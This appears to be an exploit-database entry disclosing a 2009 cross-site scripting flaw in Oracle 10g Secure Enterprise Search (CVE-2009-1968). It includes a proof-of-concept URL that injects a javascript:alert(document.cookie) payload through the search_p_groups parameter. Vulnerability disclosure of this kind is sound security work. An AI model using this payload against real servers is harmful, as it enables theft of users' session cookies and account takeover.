[] NeoSense
E X P L O I T S
title author type platform port cve id

Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting

Author: Alexandr Polyakov
type: remote
platform: multiple
port: 
date_added: 2009-06-14 
date_updated: 2014-04-29 
verified: 1 
codes: CVE-2009-1968;OSVDB-55892 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/35681/info

Oracle Database is prone to a cross-site scripting vulnerability that affects the Secure Enterprise Search component.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com:7777/search/query/search?search.timezone=&search_p_groups="&#039;><IMG%20SRC=javascript:alert(document.cookie)>&q=1234&btnSearch=Search
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.